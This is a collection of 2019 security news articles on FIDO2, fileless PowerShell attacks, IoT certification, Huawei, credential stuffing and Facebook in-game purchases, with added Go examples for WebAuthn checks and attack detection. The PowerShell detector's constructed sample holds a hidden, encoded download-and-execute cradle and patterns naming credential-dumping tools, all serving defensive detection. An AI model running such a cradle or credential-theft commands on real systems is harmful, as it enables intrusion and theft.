STE WILLIAMS

Android nudges passwords closer to the cliff edge with FIDO2 support

The passwordless web came a billion devices closer to reality on Monday when the Fast IDentity Online (FIDO) alliance announced an update to Google Play Services that brings FIDO2 certification to roughly half of all Android devices available today.

Specifically, the alliance said that any compatible device running Android 7.0+ is now FIDO2 certified out of the box or after an automated Google Play Services update.

This will allow users to log in to websites and apps that support the FIDO2 protocols by using their devices’ biometric readers – such as fingerprint or facial recognition. Alternatively, they can log in with other authenticators that are compatible with the FIDO2 specification, such as YubiKeys or Google’s own Titan Security Keys, which come in USB and Bluetooth versions.

Releasing the FIDO2 update through the automated Google Play Services feature means that it should be a pretty frictionless security boost. Manufacturers don’t have to adapt their devices or, really, do anything. That should make the security upgrade easier to get users to adopt, in contrast to two-factor authentication (2FA).

Although FIDO2 support will allow Android to accept secure web logins using hardware keys such as the YubiKey and Titan over USB, NFC, and Bluetooth, Google anticipates that fingerprint authentication will be the easiest way, and the one that’s likely to become users’ preferred method.

Google Product Manager Christiaan Brand said that FIDO2 offers protection against phishing attacks, while the FIDO Alliance said that it also protects against man-in-the-middle attacks and those that use stolen credentials.

That’s because the biometric itself never leaves the device. A fingerprint or face scan only unlocks a private key that is stored locally; what the website receives is a cryptographic signature over a one-time challenge, and the only thing the site holds is the matching public key. Each credential is bound to the site it was registered with, so a signature produced for a look-alike domain is useless to the real one, and a stolen copy of the site’s database yields nothing that can be replayed.

Wired quoted Kenn White, director of the Open Crypto Audit Project:

Providing the FIDO2 option gives really strong identity protection for account holders. You and I might be fooled by ‘paypa1.com,’ but a FIDO key won’t be. Among the security community, WebAuthn, which FIDO2 intersects with, is considered one of the strongest account protections there is.

WebAuthn is a recently minted W3C API (Application Programming Interface) that websites and web browsers use to authenticate with public key cryptography instead of passwords: the site sends a random challenge, the browser asks the authenticator to sign it, and the site checks the signature against the public key it stored at registration. It’s one of two keystone technologies required for passwordless web authentication, the other being CTAP (the Client to Authenticator Protocol), which carries the browser’s request to an external key over USB, NFC or Bluetooth.
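The exchange just described, as an added example in Go that is not code from the original article, from Google or from the FIDO Alliance. The Authenticator, RelyingParty and Demo names, the browser-side ClientData struct and the 37-byte authenticator-data layout are this example’s simplifications of the real protocol; paypal.com and paypa1.com are the domains from the Kenn White quote. It makes his point concrete: the browser scopes every request to the origin it came from, so the key has no credential to offer paypa1.com, and the server independently checks the origin, the hash of its own RP ID and a fresh challenge before it trusts the signature.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"fmt"
)

// Authenticator stands in for a FIDO2 device: one key pair per relying-party ID (rpID); the private half never leaves it.
type Authenticator struct{ keys map[string]*ecdsa.PrivateKey }

func NewAuthenticator() *Authenticator { return &Authenticator{keys: map[string]*ecdsa.PrivateKey{}} }

// Register creates a credential scoped to rpID; the relying party stores only the public key.
func (a *Authenticator) Register(rpID string) (*ecdsa.PublicKey, error) {
	priv, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil { return nil, err }
	a.keys[rpID] = priv
	return &priv.PublicKey, nil
}

// ClientData mirrors the CollectedClientData the browser builds; the browser, not the page's script, fills in origin and challenge.
type ClientData struct {
	Type      string `json:"type"`
	Challenge string `json:"challenge"`
	Origin    string `json:"origin"`
}

// Assertion is what the relying party gets back from the browser.
type Assertion struct {
	AuthData       []byte // SHA-256(rpID) || flags(1) || signCount(4), simplified from the spec
	ClientDataJSON []byte
	Signature      []byte // ECDSA over authData || SHA-256(clientDataJSON)
}

func signedMessage(authData, clientDataJSON []byte) []byte {
	cdHash := sha256.Sum256(clientDataJSON)
	msg := sha256.Sum256(append(append([]byte{}, authData...), cdHash[:]...))
	return msg[:]
}

// Sign models navigator.credentials.get(): the browser derives rpID from the page origin,
// so a credential made for paypal.com is never offered to a page at paypa1.com.
func (a *Authenticator) Sign(rpID, origin, challenge string) (*Assertion, error) {
	priv, ok := a.keys[rpID]
	if !ok { return nil, fmt.Errorf("no credential scoped to %q", rpID) }
	cd, _ := json.Marshal(ClientData{Type: "webauthn.get", Challenge: challenge, Origin: origin})
	h := sha256.Sum256([]byte(rpID))
	authData := append(h[:], 0x01, 0, 0, 0, 1) // user-presence flag set, counter 1
	sig, err := ecdsa.SignASN1(rand.Reader, priv, signedMessage(authData, cd))
	if err != nil { return nil, err }
	return &Assertion{AuthData: authData, ClientDataJSON: cd, Signature: sig}, nil
}

// RelyingParty is the server: it knows its own ID, origin and the user's public key.
type RelyingParty struct {
	ID, Origin string
	PubKey     *ecdsa.PublicKey
}

// NewChallenge returns 32 random bytes, base64url-encoded as WebAuthn does.
func NewChallenge() string { b := make([]byte, 32); rand.Read(b); return base64.RawURLEncoding.EncodeToString(b) }

// Verify runs the checks a WebAuthn server must make before accepting a login.
func (rp *RelyingParty) Verify(as *Assertion, expectedChallenge string) error {
	var cd ClientData
	if err := json.Unmarshal(as.ClientDataJSON, &cd); err != nil { return err }
	if cd.Type != "webauthn.get" || cd.Challenge != expectedChallenge {
		return fmt.Errorf("wrong type or challenge: stale or replayed assertion")
	}
	if cd.Origin != rp.Origin { return fmt.Errorf("origin mismatch: %s", cd.Origin) }
	want := sha256.Sum256([]byte(rp.ID))
	if len(as.AuthData) < 37 || string(as.AuthData[:32]) != string(want[:]) {
		return fmt.Errorf("rpIdHash mismatch: assertion was made for another site")
	}
	if !ecdsa.VerifyASN1(rp.PubKey, signedMessage(as.AuthData, as.ClientDataJSON), as.Signature) {
		return fmt.Errorf("bad signature")
	}
	return nil
}

// Demo plays out a real login, a phishing attempt and a replay; nil means the login was accepted.
func Demo() (legit, phish, replay error) {
	auth := NewAuthenticator()
	rp := &RelyingParty{ID: "paypal.com", Origin: "https://paypal.com"}
	pub, err := auth.Register(rp.ID)
	if err != nil { return err, err, err }
	rp.PubKey = pub
	c1 := NewChallenge()
	as, err := auth.Sign("paypal.com", "https://paypal.com", c1)
	if err != nil { return err, err, err }
	legit = rp.Verify(as, c1)
	// Phishing: a page at paypa1.com asks for an assertion; the browser scopes the request to that origin and the key holds nothing for it.
	_, phish = auth.Sign("paypa1.com", "https://paypa1.com", NewChallenge())
	replay = rp.Verify(as, NewChallenge()) // a captured assertion presented against a fresh challenge
	return legit, phish, replay
}
```

Calling Demo returns nil for the genuine login and errors for the other two. A production relying party additionally checks the user-presence flag, compares the signature counter with the stored one to spot cloned authenticators, and parses the COSE-encoded public key from the registration response rather than holding an ecdsa.PublicKey in memory.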

The death of passwords (hopefully!) draws nigh

Android joins what appears to be a march towards a passwordless web that’s picking up the pace. In November, Microsoft announced that its 800 million account holders would be able to log in to services like Outlook, Office, Skype and Xbox Live without using a password.

Before that, we saw Mozilla Firefox, Google Chrome and Microsoft Edge roll out support for WebAuthn.

For devs

For a deep dive into the passwordless web and what developers need to do to get us there, check out our writeup.

Specifically for this new FIDO2-ification of Android, the FIDO Alliance has these resources for developers.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/qT1gVUlM1Kw/

Who needs malware? IBM says most hackers just PowerShell through boxes now, leaving little in the way of footprints

A company’s internal network, once compromised, is now more likely to be ransacked by automated scripts than a piece of malware.

This according to researchers with IBM’s X-Force, who found that in 2018 just 43 per cent of the attacks it analyzed utilized any sort of locally installed files. Rather, the hackers utilized PowerShell scripts to execute their dirty deeds in memory without significantly touching file systems, if at all.

This finding is important because it is another reminder that admins can no longer solely rely on specific file signatures or similar as evidence of a cyber-intrusion. As with local malware infections, the attacker first needs to get the ability to run malicious commands. What differs is the next step, as the miscreant does not direct the infected machine to download, save, and execute a trojan payload.

Rather, the attack runs entirely as commands from PowerShell, where the powerful scripting language can be used to do anything from harvest and steal passwords to mine cryptocurrency.

“PowerShell is useful in data collection and analysis, but it is also favored by malicious actors who use it to forego the file system and inject malicious code directly into memory, thus enhancing obfuscation, and often evading security controls designed to detect malware deployments,” the IBM report reads.

“Threat actors of all skill levels have expanded their capabilities using PowerShell over the last few years. IBM X-Force IRIS has seen cases wherein complete malicious toolkits were contained within PowerShell scripts.”
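As an added example (not from IBM’s report or the article), here is the kind of check a detection engineer would run over PowerShell’s own script block logs (event ID 4104, which records the text of every script block at execution time, after any decoding) to catch the in-memory tradecraft the report describes. The Event type, the indicator list and the three sample events are constructed for this example; the base64-of-UTF-16LE handling of -EncodedCommand is how PowerShell really encodes that argument.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"regexp"
	"unicode/utf16"
)

// Event is the part of a PowerShell event ID 4104 (Script Block Logging)
// record that matters here: the script text that actually ran.
type Event struct {
	ID   int
	Text string
}

// -EncodedCommand carries base64 of UTF-16LE text, so the payload never shows
// up in the clear on a command line.
var encodedArg = regexp.MustCompile(`(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})`)

func decodeEncodedCommand(text string) (string, bool) {
	m := encodedArg.FindStringSubmatch(text)
	if m == nil { return "", false }
	raw, err := base64.StdEncoding.DecodeString(m[1])
	if err != nil || len(raw)%2 != 0 { return "", false }
	u := make([]uint16, len(raw)/2)
	for i := range u { u[i] = uint16(raw[2*i]) | uint16(raw[2*i+1])<<8 }
	return string(utf16.Decode(u)), true
}

// EncodeCommand is the inverse transform; it is used here only to build the
// constructed sample event, but it is exactly what attacker tooling does.
func EncodeCommand(script string) string {
	u := utf16.Encode([]rune(script))
	raw := make([]byte, 2*len(u))
	for i, c := range u { raw[2*i], raw[2*i+1] = byte(c), byte(c>>8) }
	return base64.StdEncoding.EncodeToString(raw)
}

// Indicators of fileless, in-memory tradecraft. Each is weak on its own (admins
// use IEX too); the score is how many co-occur in one script block.
var indicators = []struct {
	Name string
	Re   *regexp.Regexp
}{
	{"download-cradle", regexp.MustCompile(`(?i)Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest`)},
	{"invoke-expression", regexp.MustCompile(`(?i)\bIEX\b|Invoke-Expression`)},
	{"in-memory-load", regexp.MustCompile(`(?i)Reflection\.Assembly\]::Load|VirtualAlloc|FromBase64String`)},
	{"stealth-flags", regexp.MustCompile(`(?i)-w(?:indowstyle)?\s+hidden|\s-nop\b|\s-noni\b`)},
	{"credential-access", regexp.MustCompile(`(?i)Invoke-Mimikatz|sekurlsa|lsass`)},
}

type Finding struct {
	EventID int
	Decoded string   // plaintext of -EncodedCommand, if one was present
	Hits    []string // indicator names that matched
}

func (f Finding) Score() int { return len(f.Hits) }

func (f Finding) Has(name string) bool {
	for _, h := range f.Hits { if h == name { return true } }
	return false
}

// Analyze inspects one script block, decoding -EncodedCommand first so the
// indicators are matched against what actually runs, not the wrapper.
func Analyze(ev Event) Finding {
	f := Finding{EventID: ev.ID}
	text := ev.Text
	if dec, ok := decodeEncodedCommand(text); ok {
		f.Hits = append(f.Hits, "encoded-command")
		f.Decoded = dec
		text += "\n" + dec
	}
	for _, ind := range indicators {
		if ind.Re.MatchString(text) { f.Hits = append(f.Hits, ind.Name) }
	}
	return f
}

// SampleEvents are constructed for this example, not real telemetry; the IP
// is from the RFC 5737 documentation range.
func SampleEvents() []Event {
	cradle := "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage.ps1')"
	return []Event{
		{1, `Get-ChildItem C:\Users | Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-1) }`},
		{2, "powershell.exe -nop -w hidden -enc " + EncodeCommand(cradle)},
		{3, `[System.Reflection.Assembly]::Load([Convert]::FromBase64String($blob)).EntryPoint.Invoke($null, $null)`},
	}
}

func main() {
	for _, ev := range SampleEvents() {
		f := Analyze(ev)
		fmt.Printf("event %d score=%d hits=%v\n", ev.ID, f.Score(), f.Hits)
	}
}
```

Script block logging has to be switched on first (Group Policy: Turn on PowerShell Script Block Logging), and the indicator list is deliberately short. In production, weight each indicator, tune against your own administrators’ habits, and treat a decoded download cradle, or a -w hidden -nop -enc launch whose parent is an Office application or browser, as high confidence on its own.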

In some cases, crooks wouldn’t even need to run a super-leet exploit to steal corporate data. The X-Force report notes that misconfiguration incidents – instances where databases and storage buckets were left exposed to the public-facing internet – were also up 20 per cent from last year and accounted for 43 per cent of all of the exposed records X-Force tracked last year.

In addition to the exposed files and records themselves, misconfigurations could also indirectly lead to other attacks when things like passwords and email addresses are involved and used to login to other accounts on other services to carry out further mischief.

Finally, the report found, the tried and true social engineering attack remains as effective as it has ever been.

Last year, IBM found that 29 per cent of the attacks it analyzed were phishing attacks, and 45 per cent of those were targeted attacks on specific employees, something X-Force terms business email compromise (BEC).

“When it comes to the most lucrative types of social engineering scams, BEC has been a growing tide for several years spanning all industries and geographies,” notes X-Force.

It seems that, despite the various methods available for sophisticated attacks, a bogus “CEO” email demanding a wire transfer is still a reliable way to con a company out of cash. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/02/26/malware_ibm_powershell/

New Arm Certification Aims to Secure IoT Devices

A three-tier certification regimen shows adherence to the Platform Security Architecture.

Arm, which designs processors used in devices from smart doorbells to supercomputers, is partnering with five laboratories and consulting firms to develop a certification for adherence to the Platform Security Architecture (PSA). The PSA is a framework and set of resources designed to help improve the security of Internet of Things (IoT) devices starting with the processing chips themselves.

PSA Certified offers three levels of certification in an attempt to prove basic security principles have been embedded in IoT hardware.

“This will enable trust in individual devices, in their data, and in the deployment of these devices at scale in IoT services, as we drive towards a world of a trillion connected devices,” said Paul Williamson, vice president and general manager of Arm’s Emerging Businesses Group, in a statement announcing the certification.

Level 1 certification involves a questionnaire for the manufacturer seeking certification, with the precise contents of the form varying depending on whether the component is a chip, device, operating system, or something else. The questionnaire is based on the 10 security model goals of the PSA architecture and is used, along with a lab check at one of the PSA-certified lab partners, to ensure compliance.

According to Arm, a number of manufacturers have attained Level 1 certification. They include Cypress, Express Logic, Microchip, Nordic Semiconductor, Nuvoton, NXP, STMicroelectronics, and Silicon Labs. 

Levels 2 and 3 certification require lab tests against the PSA root of trust protection profile; Level 3 also includes additional tests involving side-channel attacks and other vulnerabilities. These levels are intended for CPU and chip vendors to prove that their devices can be trusted as the basis of secure systems. These tests will be provided by testing lab partners Brightsight, CAICT, Riscure, and UL, along with the consultancy Prove & Run.

For a growing number of consumers and businesses, IoT security is a critical component of personal and financial security. In the “Avast Smart Home Security Report 2019,” released today, researchers note that more than 40% of homes worldwide – and 62% of homes in the US – have more than five connected smart devices.

“It only takes one weak device to let in a bad hacker, and once they are on the network, they can access other devices and the personal data they stream or store, including live videos and voice recordings,” said Avast president Ondrej Vlcek, commenting on the report.

Curtis Franklin Jr. is Senior Editor at Dark Reading. In this role he focuses on product and technology coverage for the publication. In addition he works on audio and video programming for Dark Reading and contributes to activities at Interop ITX, Black Hat, INsecurity, and …

Article source: https://www.darkreading.com/iot/new-arm-certification-aims-to-secure-iot-devices/d/d-id/1333958?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

China’s tech giants are a security threat to the UK, says Brit spy bigwig

The world must “understand the opportunities and threats from China’s technological offer”, GCHQ director Jeremy Fleming said today as he observed that there are “no clear norms or behaviours” for state-on-state cyber-squabbling.

Speaking at an International Institute for Strategic Studies event in Singapore, Fleming called for the world’s “cyber powers” to “converge on agreed definitions, on regulatory frameworks, industry standards and norms of ethical behaviour” (PDF).

He also commented on Britain’s oversight of Chinese mobile network equipment company Huawei and its cybersecurity practices, saying: “Experience shows that any company in an excessively dominant market position will not be incentivised to take cybersecurity seriously. So we need a diversified market, competing on quality and security, as well as price.”

Fleming also directly challenged China, Iran, Russia and North Korea over online hacking attacks, vowing that “the UK and its allies will keep calling this out”. He highlighted the public attribution of the APT10 hacking group’s activities to China in December 2018 as one example.

The location of Fleming’s speech, Singapore, is no coincidence. Over the next few years the UK aims to step up its presence in the Far East, including a deployment of a Royal Navy task force to the South China Sea in 2021.

We’re doing it Huawei, OK?

Fleming’s remarks about China will intensify the pressure on Huawei over allegations that the Chinese state uses the company’s presence to insert covert backdoors for spying on western companies and governments. The British government tacitly acknowledged this last week by admitting that it bans Huawei equipment from its own networks, leaving the private sector and general public to take their chances.

No concrete evidence has so far emerged that Huawei equipment contains a backdoor or any other means for China to snoop through it.

Meanwhile, Nick Read, chief exec of Vodafone, publicly called for America to share its evidence that Huawei mobile network equipment poses a national security threat to countries its kit is installed in.

“People are saying things at the moment that are not grounded. I’m not saying that is the case for the US because I have not met them directly myself so I have not seen what evidence they have, but they clearly need to present that evidence to the right bodies throughout Europe,” Read said at Mobile World Congress in Barcelona this morning, as quoted by Reuters.

Huawei has also gone on the PR offensive in recent weeks, with executives speaking publicly, including founder Ren Zhengfei, who gave an unusual public interview to the BBC last month. Such a move is a new one for the company, which, while not shunning the limelight, has until now not tried to take the public initiative. ®

Digital homeland?

Fleming’s speech has also riled up defenders of the internet who have noted his argument that businesses and institutions “must protect the digital homeland.”

The “digital homeland” analogy is an apparently clear sign that Fleming views the global telecommunications network as something that can or should have geographic borders: an approach that reflects the mindset of China and Russia rather than the traditional Western view of the web.

Both China and Russia have increasingly adopted the idea that they will have their “own” internet, largely as a result of what they feared was a creeping influence of outside voices into their cultures. China, in effect, operates a national intranet with carefully controlled access points to the broader global internet.

Russia has also repeatedly suggested in recent years that it will cut off its citizens’ access to the global network and build its own internal internet. But to hear a Western democracy float the model of a national internet is, to many, an alarm bell that the voices of control in UK society – in this case, the security services – increasingly view the internet as something to be controlled rather than adapted to.

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/02/25/gchq_director_jeremy_fleming_china_opportunity_threat/

Jeez, what a Huawei to go: Now US senators want Chinese kit ripped out of national leccy grid

Equipment made by Chinese electronics giant Huawei could be torn out of America’s electrical grid, if US senators get their way.

The bipartisan Senate Intelligence Committee today recommended Uncle Sam’s Department of Energy and Department of Homeland Security move to keep Huawei hardware out of the Land of the Free’s power networks.

Specifically, the legislators said, they want both agencies to bar utilities from purchasing and installing a specific family of network-connected inverters Huawei produces for solar power installations. These inverters convert DC electricity from the panels into AC for the grid, and can be controlled remotely to manage solar arrays.

The senators reason that if Huawei cannot be trusted to supply computer gear for communications systems, it should not be supplying vital electronics for new solar plants either. The committee members fear Beijing will instruct Huawei to backdoor its products, allowing Chinese spies to silently snoop on Western targets from afar. Huawei insists it is not compromising its kit for its Communist overlords.

“Huawei has recently become the world’s largest maker of inverters – the sophisticated control systems that have allowed the rapid expansion of residential and utility scale energy production,” the committee says in its letter (PDF) to DOE boss Rick Perry and DHS head Kirstjen Nielsen. “Both large-scale photovoltaic systems and those used by homeowners, school districts, and businesses are equally vulnerable to cyberattacks.

“Our federal government should consider a ban on the use of Huawei inverters in the United States and work with state and local regulators to raise awareness and mitigate potential threats.”

Among the high-ranking senators signing off on the letter are Mitt Romney (R-UT), Dianne Feinstein (D-CA), Tom Cotton (R-AR), and Little Marco Rubio (R-FL). Senators Cotton and Rubio had previously spearheaded successful efforts to get Huawei products barred.

Huawei already faces a blanket ban on its wireless and networking gear in US government networks, as the administration believes the Chinese will use the hardware to spy on private and public-sector organizations. Since 2018 the US government has said that it will not provide federal assistance funds to any phone company that uses Huawei gear, a move that effectively bars Huawei equipment from most large carriers in the nation.

At the same time, the Feds have charged Huawei chief financial officer Meng Wanzhou with illegally breaking sanctions against Iran, and are trying to extradite her from Canada to America. Meng, daughter of the corporation’s founder Ren Zhengfei, and Huawei itself deny those charges, as well as the allegation that the company works with the Chinese government to spy on foreign entities. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/02/25/huawei_us_electric_grid/

TurboTax Hit with Cyberattack, Tax Returns Compromised

Officials report an unauthorized party obtained tax return data by using credentials obtained from an outside source.

Intuit, a financial software company and creator of services Mint, QuickBooks, and TurboTax, reports the latter has been hit with a credential stuffing attack targeting users’ tax return information.

The incident was discovered during a system security review, Intuit reported in a breach disclosure letter filed with the Office of the Vermont Attorney General and shared with affected users. Officials explain how an unauthorized party targeted TurboTax users by taking usernames and passwords “from a non-Intuit source,” which they used in a credential stuffing attack.

If their login was successful, attackers may have accessed data contained in a prior year’s tax return or current tax returns in progress. This includes name, Social Security number, address(es), birthdates, driver’s license number, and financial data (salary, deductions), as well as information belonging to other individuals included in the victim’s tax return, they report.

Upon discovering the problem, Intuit made affected accounts temporarily unavailable to protect data from further unauthorized access. It’s offering victims one year of free identity protection, credit monitoring, and identity restoration services via Experian IdentityWorks.
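Credential stuffing as described above leaves a distinctive trace in authentication logs: the attacker is trying a long list of username/password pairs leaked from other sites, each against its own account, rather than many passwords against one account. The Go program below is an added example (it is not Intuit’s code and knows nothing about TurboTax’s systems): it parses a constructed login log in a format invented for this example and flags any source that touched many distinct accounts within a short window, listing the accounts it got into so they can be locked and reset.

```go
package main

import (
	"fmt"
	"sort"
	"strings"
	"time"
)

// Attempt is one parsed login record.
type Attempt struct {
	At      time.Time
	IP      string
	User    string
	Success bool
}

// ParseLine reads the constructed log format used in this example, e.g.
//   2019-02-20T10:00:01Z ip=203.0.113.5 user=alice result=FAIL
func ParseLine(line string) (Attempt, error) {
	f := strings.Fields(line)
	if len(f) != 4 { return Attempt{}, fmt.Errorf("malformed line: %q", line) }
	at, err := time.Parse(time.RFC3339, f[0])
	if err != nil { return Attempt{}, err }
	val := func(s, key string) string { return strings.TrimPrefix(s, key+"=") }
	return Attempt{At: at, IP: val(f[1], "ip"), User: val(f[2], "user"), Success: val(f[3], "result") == "OK"}, nil
}

// Alert is raised for a source that tried many distinct accounts inside one window.
type Alert struct {
	IP            string
	DistinctUsers int
	Failures      int
	Successes     []string // accounts the source got into: candidates for a forced reset
}

// Detect slides a time window over each source IP's attempts. A stuffing run
// looks unlike a brute force: one or two tries per account, many accounts per
// source, and a low but non-zero success rate from reused passwords.
func Detect(attempts []Attempt, window time.Duration, minUsers int) []Alert {
	byIP := map[string][]Attempt{}
	for _, a := range attempts { byIP[a.IP] = append(byIP[a.IP], a) }
	var alerts []Alert
	for ip, list := range byIP {
		sort.Slice(list, func(i, j int) bool { return list[i].At.Before(list[j].At) })
		start := 0
		for end := range list {
			for list[end].At.Sub(list[start].At) > window { start++ }
			users, fails, hits := map[string]bool{}, 0, []string(nil)
			for _, a := range list[start : end+1] {
				users[a.User] = true
				if a.Success { hits = append(hits, a.User) } else { fails++ }
			}
			if len(users) >= minUsers {
				alerts = append(alerts, Alert{IP: ip, DistinctUsers: len(users), Failures: fails, Successes: hits})
				break // one alert per source is enough for this example
			}
		}
	}
	sort.Slice(alerts, func(i, j int) bool { return alerts[i].IP < alerts[j].IP })
	return alerts
}

// SampleLog is constructed for this example; addresses are from the RFC 5737
// documentation ranges. The first source walks a leaked list; the second is
// one user mistyping a password, which must not be flagged.
var SampleLog = []string{
	"2019-02-20T10:00:01Z ip=203.0.113.5 user=alice result=FAIL",
	"2019-02-20T10:00:02Z ip=203.0.113.5 user=bob result=FAIL",
	"2019-02-20T10:00:02Z ip=203.0.113.5 user=carol result=OK",
	"2019-02-20T10:00:03Z ip=203.0.113.5 user=dave result=FAIL",
	"2019-02-20T10:00:04Z ip=203.0.113.5 user=erin result=FAIL",
	"2019-02-20T10:00:05Z ip=203.0.113.5 user=frank result=FAIL",
	"2019-02-20T10:03:00Z ip=198.51.100.9 user=alice result=FAIL",
	"2019-02-20T10:03:20Z ip=198.51.100.9 user=alice result=FAIL",
	"2019-02-20T10:03:40Z ip=198.51.100.9 user=alice result=OK",
}

// Run parses the lines and returns the alerts for the given window and threshold.
func Run(lines []string, window time.Duration, minUsers int) ([]Alert, error) {
	var attempts []Attempt
	for _, l := range lines {
		a, err := ParseLine(l)
		if err != nil { return nil, err }
		attempts = append(attempts, a)
	}
	return Detect(attempts, window, minUsers), nil
}

func main() {
	alerts, err := Run(SampleLog, time.Minute, 5)
	if err != nil { panic(err) }
	for _, a := range alerts {
		fmt.Printf("%s tried %d accounts (%d failures) and got into %v\n", a.IP, a.DistinctUsers, a.Failures, a.Successes)
	}
}
```

Real stuffing runs are spread across proxy pools, so the same logic is usually keyed on more than source IP (ASN, user agent, TLS fingerprint) and run alongside per-account checks such as a successful login from a never-seen device right after a failure; the window and threshold here (one minute, five accounts) are starting points to tune, not recommendations.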

Read more details here.
Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article.

Article source: https://www.darkreading.com/threat-intelligence/turbotax-hit-with-cyberattack-tax-returns-compromised/d/d-id/1333954?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Russian Hacker Pleads Guilty to Bank Fraud

The hacker ran a botnet that spread ‘NeverQuest’ malware for three years and collected millions of banking credentials.

Stanislav Vitaliyevich Lisov, a Russian citizen accused of using the NeverQuest banking Trojan to steal login information from victims, has pleaded guilty to one count of conspiracy to commit computer hacking in Manhattan Federal Court. The crime carries a maximum penalty of five years in prison.

According to statements made in court, Lisov — also known as “Black,” a/k/a “Blackf” — was responsible for creating and administering a botnet of machines infected with NeverQuest between June 2012 and January 2015. He also was responsible for maintaining the infrastructure of, and managing, a network of servers containing lists of millions of stolen login credentials – including usernames, passwords, and security questions and answers – for victims’ accounts on banking and other financial websites.

Lisov was arrested in Spain on January 13, 2017, and on January 19, 2018 was extradited from Spain to the United States. He is scheduled for sentencing on June 27, 2019.

For more, read here.

Article source: https://www.darkreading.com/application-security/russian-hacker-pleads-guilty-to-bank-fraud-/d/d-id/1333956?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Facebook tricked kids into in-game purchases, say privacy advocates

In 2011, Glynnis Bohannon’s 12-year-old son handed her $20. In exchange, she let him use her credit card so he could spend $20 on “Facebook Credits” to use in the Ninja Saga game.

At least, that’s how much he, and she, thought they were spending. A year and nearly $1,000 of credit card charges later – he hadn’t known that the virtual currency came with a real-world cost – Ms. Bohannon and another exasperated, cash-sapped parent filed a class action lawsuit against Facebook.

Facebook was ordered to refund parents when the suit was settled in 2016, but the repercussions are still rippling out after a court granted a request to unseal the legal documents, made by the Center for Investigative Reporting (CIR).

On Thursday, more than a dozen groups that advocate for children’s rights said they’re asking the Federal Trade Commission (FTC) to investigate whether Facebook has engaged in illegal, unfair or deceptive practices by enticing children to spend money on in-game purchases without their parents’ consent.

After looking over 135 pages of documents unsealed last month, the CIR says that internal Facebook memos, “secret strategies” and employee emails paint what it calls a “troubling picture” of how Facebook conducted business between 2010 and 2014.

The judge allowed Facebook to keep some documents sealed. What’s come into the light of day paints an extremely unflattering portrait of the company, and that’s saying a lot for Facebook.

Some of the unsavory practices of monetizing kids that are revealed in the documents:

“Friendly fraud”

One memo sought to explain “friendly fraud” (FF) – Facebook’s term for children spending money on games without parental permission – to explain “what it is, why it’s challenging, and why you shouldn’t try to block it.”

  • Facebook told game developers that FF was a positive when it came to maximizing revenues, according to an email titled “developer education for loss insights” that outlines the company’s game strategy.
  • Another internal document refers to situations in games where children didn’t even know they were spending money. Facebook knew all about this, the CIR says:

    Their own reports showed underage users did not realize their parents’ credit cards were connected to their Facebook accounts and they were spending real money in the games, according to the unsealed documents.

    In fact, in that report, it’s suggested that maybe Facebook should just refund parents. Facebook chose to ignore such warnings from its own employees for years. Instead, it told game developers that it was focused on maximizing revenues.

  • Another document is a transcript of a discussion between Facebook employees after parents found out how much their kids had spent. In one case, a 15-year-old racked up $6,545 during two weeks of gameplay on Facebook. Facebook employees call such children “whales” – a term used in the casino industry to describe profligate spenders. Such children could blithely rack up big bills by purchasing in-game features such as crop-unwilt in FarmVille, for example, or magic spells, or flaming swords, or any of the other features that help game players. In the conversation about the $6,545 credit card bill that resulted from such naivety, the Facebook employees recommend not refunding the parent.

Parents who couldn’t get a response from Facebook, be it from emailing or phone messages, were forced to turn to the Better Business Bureau, or their credit card companies, to get their money back, according to the CIR.

Facebook made a clear decision

The CIR said that the revenue that Facebook made from “bamboozling” children had such large chargeback rates – that’s when credit card companies had to claw back money on behalf of parents – that it far exceeded what the FTC judges to be a red flag for deceptive business practices. All of this went on for years, the CIR said:

Despite the many warning signs, which continued for years, Facebook made a clear decision. It pursued a goal of increasing its revenues at the expense of children and their parents.

Facebook employees not only knew about the problem of FF; they also came up with a solution… that was ignored. To reduce credit card company chargebacks, Facebook employee Tara Stewart suggested to colleagues that the company should just refund money to parents when their kids clearly used their credit card without permission.

A few months earlier, she’d launched a test project to help Facebook reduce chargebacks by requiring children to re-enter the first six digits of the credit card number on certain games before they could spend money. It worked, according to internal documents: It lowered the number of refund and chargeback requests from children.

It had one problem, though: it would have denied Facebook a sizeable chunk of revenue.

In response to a report that found that Angry Birds had a sky-high refund rate of 5-10% (a 2% chargeback rate being what the FTC calls a “red flag” about a “deceptive” business), one Facebook employee wrote:

If we were to build risk models to reduce it, we would most likely block good TPV [total purchase value].

…In other words, revenue.

They ALL squeeze kids like they were so many juicy lemons

Facebook isn’t the only tech company to profit off of game-playing kids. Apple, Google and Amazon have all been accused of squeezing profit out of kids by making it too easy for them to spend money in apps.

All three have also reached settlements with the FTC that required the companies to pay tens of millions in refunds and forced them to modify their billing practices to ensure express consent from parents for in-app purchases.

Facebook’s response

This is what Facebook had to say when the CIR asked for an interview:

We were contacted by the Center for Investigative Reporting last year, and we voluntarily unsealed documents related to a 2012 case about our refund policies for in-app purchases that parents believe were made in error by their minor children.

We intend to release additional documents as instructed by the court. Facebook works with parents and experts to offer tools for families navigating Facebook and the web. As part of that work, we routinely examine our own practices, and in 2016 agreed to update our terms and provide dedicated resources for refund requests related to purchases made by minors on Facebook.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/-4Iewiyjz5k/

Missile warning sent from hijacked Tampa mayor’s Twitter account

Officials in Tampa, Florida, were scrambling to regain control of the mayor’s Twitter account this week after a hacker hijacked it to post bomb threats and child sex abuse images. The attacker, who took over the account just two weeks before the city’s municipal elections, tried to implicate others in the hijacking.

